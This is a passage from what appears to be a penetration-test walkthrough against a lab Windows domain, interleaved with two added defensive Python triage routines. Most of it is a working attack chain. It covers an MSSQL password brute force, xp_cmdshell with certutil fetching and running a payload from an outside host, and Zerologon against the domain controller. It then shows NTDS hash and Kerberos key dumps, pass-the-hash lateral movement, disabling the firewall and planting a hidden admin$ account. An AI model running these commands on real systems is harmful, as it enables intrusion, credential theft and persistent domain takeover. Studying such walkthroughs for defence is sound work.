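            hosts[ip]["os"] = os_name or hosts[ip]["os"]
    for h in hosts.values():
        h["ports"].sort()
    return dict(hosts)


ROLE_PORTS = {88: "kerberos (domain controller candidate)", 445: "smb",
              1433: "mssql", 3389: "rdp"}


def review(hosts: dict) -> list:
    """(ip, finding) pairs, most urgent first."""
    findings = []
    for ip, h in hosts.items():
        for v in h["vulns"]:
            findings.append((0, ip, "vulnerable: " + v))
        for port in h["ports"]:
            if port in ROLE_PORTS:
                findings.append((1, ip, f"exposed service: {port}/{ROLE_PORTS[port]}"))
        if h["other_ips"]:
            findings.append((2, ip, f"dual-homed host {h['hostname']!r}, also on "
                                    + ", ".join(h["other_ips"])))
    findings.sort()
    return [(ip, msg) for _, ip, msg in findings]
```

On the sample, review() puts the SMBGhost finding on 192.168.0.1 first and ends with the dual-homed db host; the NetInfo line is the one that reveals the second network before any scan of it is run.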

Brute-forcing the MSSQL password with Hydra

Usually the MSSQL account is sa; a username list can also be supplied for brute forcing.

proxychains4 hydra -l sa -P /usr/share/wordlists/top10000.txt 192.168.0.161 mssql -vV -f

Password brute-forced successfully

  • sa
  • freepass

Connect to MSSQL with mssqlclient.py and get a CS session

proxychains4 python3 mssqlclient.py sa@192.168.0.161
freepass

Enable xp_cmdshell to execute commands

enable_xp_cmdshell
xp_cmdshell whoami

Generate a payload in CS, then download and run it via commands to get a shell

I'll skip the listener and payload generation.

# download the payload
xp_cmdshell certutil -urlcache -split -f http://192.168.0.23:8080/artifact.exe c:/windows/temp/artifact.exe
# run the payload
xp_cmdshell c:/windows/temp/artifact.exe

Session established

Privilege escalation with MS16-075

Escalate privileges using ms16-075

Information gathering

Network adapter information

shell ipconfig

A second subnet exists: 10.10.10.1/24

Set up a proxy and scan with fscan

Configure /etc/proxychains4.conf

socks4  127.0.0.1 1089

Scan through the proxy with fscan

proxychains4 ./fscan_amd64_1.6 -h 10.10.10.1/24
# scan result
start infoscan
The current user permissions unable to send icmp packets
start ping
(icmp) Target '10.10.10.1' is alive
(icmp) Target '10.10.10.135' is alive
(icmp) Target '10.10.10.136' is alive
icmp alive hosts len is: 3
10.10.10.135:88 open
10.10.10.135:445 open
10.10.10.136:135 open
10.10.10.136:1433 open
10.10.10.1:139 open
10.10.10.135:135 open
10.10.10.1:135 open
10.10.10.136:80 open
10.10.10.136:445 open
10.10.10.1:445 open
10.10.10.136:139 open
10.10.10.135:139 open
10.10.10.1:443 open
alive ports len is: 13
start vulscan
[+] 10.10.10.1 CVE-2020-0796 SmbGhost Vulnerable
NetInfo:
[*]10.10.10.1[->]penetration[->]192.168.1.8[->]192.168.10.1[->]192.168.0.1[->]10.10.10.1[->]240e:398:54a4:1a50:8038:7e62:830b:2a04[->]240e:398:54a4:1a50:b871:fbd2:3951:ed0c
NetInfo:
[*]10.10.10.136[->]db[->]10.10.10.136[->]192.168.0.161
NetInfo:
[*]10.10.10.135[->]ad[->]10.10.10.135
[*] 10.10.10.136         SCANER\DB                Windows Server 2012 R2 Standard 9600
[*] WebTitle:http://10.10.10.136       code:404 len:315    title:Not Found
[*] 10.10.10.135   [+]DC __MSBROWSE__\AD                Windows Server 2012 R2 Standard 9600
[*] 10.10.10.135  (Windows Server 2012 R2 Standard 9600)
[*] WebTitle:https://10.10.10.1        code:403 len:0      title:None
已完成 16/16
scan end

Domain controller found

Domain controller information gathering

shell net time /domain
# domain controller hostname obtained: ad.scaner.sec

Attacking the domain controller with Zerologon

exp download: https://github.com/VoidSec/CVE-2020-1472

Set the domain controller's password to empty

proxychains4 python3 cve-2020-1472-exploit.py -t 10.10.10.135 -n ad

Attack succeeded!

Reading hashes with secretsdump.py

proxychains4 python3 secretsdump.py scaner.sec/ad\$@10.10.10.135 -no-pass
# output
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[proxychains] Strict chain  ...  127.0.0.1:1089  ...  10.10.10.135:445  ...  OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1089  ...  10.10.10.135:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1089  ...  10.10.10.135:49157  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:699ff4337d59499ab67f9967ace8afec:::
scaner.sec\db:1614:aad3b435b51404eeaad3b435b51404ee:5a63042c9c9d2e99956f1414e2bfcee6:::
AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DB$:1615:aad3b435b51404eeaad3b435b51404ee:63dea6de1590fd5bf9e0e1531aa9d0a2:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:2978bba376f83eab7acfd4a2e3c68f41b0fbf90f85014d8ec136cb0f9ab06460
krbtgt:aes128-cts-hmac-sha1-96:e73c9453f5df1077d1132c562c3b20df
krbtgt:des-cbc-md5:91f2ab6198c1adf2
scaner.sec\db:aes256-cts-hmac-sha1-96:21a881e53c7acb3ca6dfe29b94ad56f90e72f3771695e3413a1eda1394b076b5
scaner.sec\db:aes128-cts-hmac-sha1-96:83044b37dab189c04fff6d5ca76a4251
scaner.sec\db:des-cbc-md5:f2cd2c3bceae0dcd
AD$:aes256-cts-hmac-sha1-96:182d64eca1353b996e52514e769373643eb9d0ad78c8203ddfe9be00ff9e2930
AD$:aes128-cts-hmac-sha1-96:9b3827f3d3c26a50b1ca574908577948
AD$:des-cbc-md5:e6fd2cae86c479fb
DB$:aes256-cts-hmac-sha1-96:d748cb5d58bc9f2b853e89b8a2d390ed5d9d8366086c0dd0e542baf02cf37d3c
DB$:aes128-cts-hmac-sha1-96:87a5c15f59f462741136ec3fdac2e615
DB$:des-cbc-md5:e691e6139e32dfc8
[*] Cleaning up...
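The dump above also shows what Zerologon leaves behind for a defender to find: the AD$ machine account carries 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of the empty password, which a domain controller's computer account should never have. As an added example, not part of the post and not impacket code: a triage routine for secretsdump-style NTLM lines that flags exactly that condition, along with stored LM hashes and password reuse. The sample lines are the six account lines from the dump above; the severity labels are this example's own choice.

```python
import re

EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
NO_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"      # LM field when LM hashes are not stored

# The six account lines dumped from the domain controller above.
SAMPLE_DUMP = r"""
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:699ff4337d59499ab67f9967ace8afec:::
scaner.sec\db:1614:aad3b435b51404eeaad3b435b51404ee:5a63042c9c9d2e99956f1414e2bfcee6:::
AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DB$:1615:aad3b435b51404eeaad3b435b51404ee:63dea6de1590fd5bf9e0e1531aa9d0a2:::
"""

LINE_RE = re.compile(
    r"^(?P<account>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")


def parse_dump(text: str) -> list:
    """Keep only NTLM lines; status lines and Kerberos key lines do not match."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        account = m["account"].split("\\")[-1]          # drop any "domain\" prefix
        rows.append({"account": account, "rid": int(m["rid"]), "lm": m["lm"],
                     "nt": m["nt"], "machine": account.endswith("$")})
    return rows


def triage(rows: list) -> list:
    """(severity, account, finding) tuples for whoever reviews the dump."""
    findings = []
    for r in rows:
        if r["lm"] != NO_LM_HASH:
            findings.append(("medium", r["account"], "LM hash stored"))
        if r["nt"] == EMPTY_NT_HASH:
            if r["machine"]:
                findings.append(("critical", r["account"],
                                 "machine account with an empty password: the state a "
                                 "Zerologon (CVE-2020-1472) reset leaves the DC account in"))
            elif r["rid"] == 501:
                findings.append(("info", r["account"], "built-in Guest, empty password"))
            else:
                findings.append(("high", r["account"], "user account with an empty password"))
    # Identical NT hashes on different accounts mean an identical password.
    by_hash = {}
    for r in rows:
        by_hash.setdefault(r["nt"], []).append(r["account"])
    for nt, accounts in by_hash.items():
        if nt != EMPTY_NT_HASH and len(accounts) > 1:
            findings.append(("high", ",".join(accounts), "same password on several accounts"))
    return findings
```

Run on the sample, triage() reports Guest as informational and AD$ as critical; a machine account in that state is the signal that the computer account password was reset by something other than the normal 30-day rotation, which is what the restoration section later in the post has to undo.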

Getting the domain controller into CS

Above we already obtained the Administrator hash; first get a CS session

Getting the session via the GUI

Set up the forwarding listener

Add a password credential

Add a target

Lateral movement with psexec64

Session established

Getting the session via commands

Likewise set up the forwarding listener

Establish an IPC$ connection

pth scaner\administrator 35dc382e7d31f6823c2e34216d4c15cb
# test whether the IPC$ connection is established
shell dir \\10.10.10.135\c$

jump to get a CS session

jump psexec64 10.10.10.135 re_tcp

Restoring the domain controller's password

Export the registry

Save the following as a bat script and run it on the target machine.

reg save HKLM\SYSTEM c:\system.save
reg save HKLM\SAM c:\sam.save
reg save HKLM\SECURITY c:\security.save

Download the registry files

Read the $MACHINE.ACC hash with secretsdump.py from the impacket toolkit

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
# output
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0x34f31a092a249b2515d55516e01ccb3a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e7d7b11f5b4352988cddcd12daa1510:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
SCANER.SEC/db:$DCC2$10240#db#b2c8206c5a3cc07e3f34b53c23ab2a26
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:e95fe4b136a34299edcabc9d49068c3df6cc89c5e94a31bca5c2f9ba24eb2cd4b421b4c50b967a3d40c46413764cc9a0675ef67c1cb0d6313242b55c8a6b8ae1211e8f4b69eedb98bc6e86bd2f3076f4b7380412b6834333d6c7a24d137a2823ccd5ac0ef344c878f939e10b88eac4a097f7df7e28d5188092a2e5d11e898ac75a306e7bfd56ef842c4d701c063efbeb03f80453edadf75e07bc0c96a27ea21577e2be606348ca4a333f8b9a8c291f3b15e37d00d0a49a182cd5ed8a48bd0cb7ef968a55964d8cc7b768007bcbf1580be46a939f33dbbd4d6a70af0afff534625e1e5b419e43cb49d46b6312e6d30eba
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:63dea6de1590fd5bf9e0e1531aa9d0a2
[*] DPAPI_SYSTEM
dpapi_machinekey:0x853d47834a284f96d756c69dd569b5a0bdaed756
dpapi_userkey:0x505968a6643a760441727edff825458bf54c1ba6
[*] NL$KM
 0000   10 B9 B5 A6 0D 04 15 CD  A3 0C 9D 55 4E 86 23 9E   ...........UN.#.
 0010   7A 14 5D F1 2C 6D 90 AB  0F D5 BC 9B 9E B3 EB 76   z.].,m.........v
 0020   09 79 A5 03 19 DF 60 8A  82 6F AB 2B 68 C1 E7 DB   .y....`..o.+h...
 0030   29 21 10 1D D1 44 CF D6  35 26 F6 14 40 7E 8B B0   )!...D..5&..@~..
NL$KM:10b9b5a60d0415cda30c9d554e86239e7a145df12c6d90ab0fd5bc9b9eb3eb760979a50319df608a826fab2b68c1e7db2921101dd144cfd63526f614407e8bb0
[*] Cleaning up...

Restore the password with reinstall_original_pw.py

proxychains4 python3 reinstall_original_pw.py ad 10.10.10.135 63dea6de1590fd5bf9e0e1531aa9d0a2

After a long wait, the password was restored successfully.

RDP to the domain controller for a commemorative screenshot

Disable the firewall

netsh advfirewall set allprofiles state off #disable the firewall
netsh advfirewall show allprofiles      #show firewall status

Add a hidden administrator account

shell net user admin$ QWEasd123 /add  && net localgroup administrators admin$ /add

Log in to the domain admin with xfreerdp

If the connection fails it may be a firewall issue.

proxychains4 xfreerdp /u:admin$ /p:QWEasd123 /v:10.10.10.135

Project summary

The intranet part of this project is not very hard; the hard part is the deserialization exploitation.

So security and openness are both indispensable.
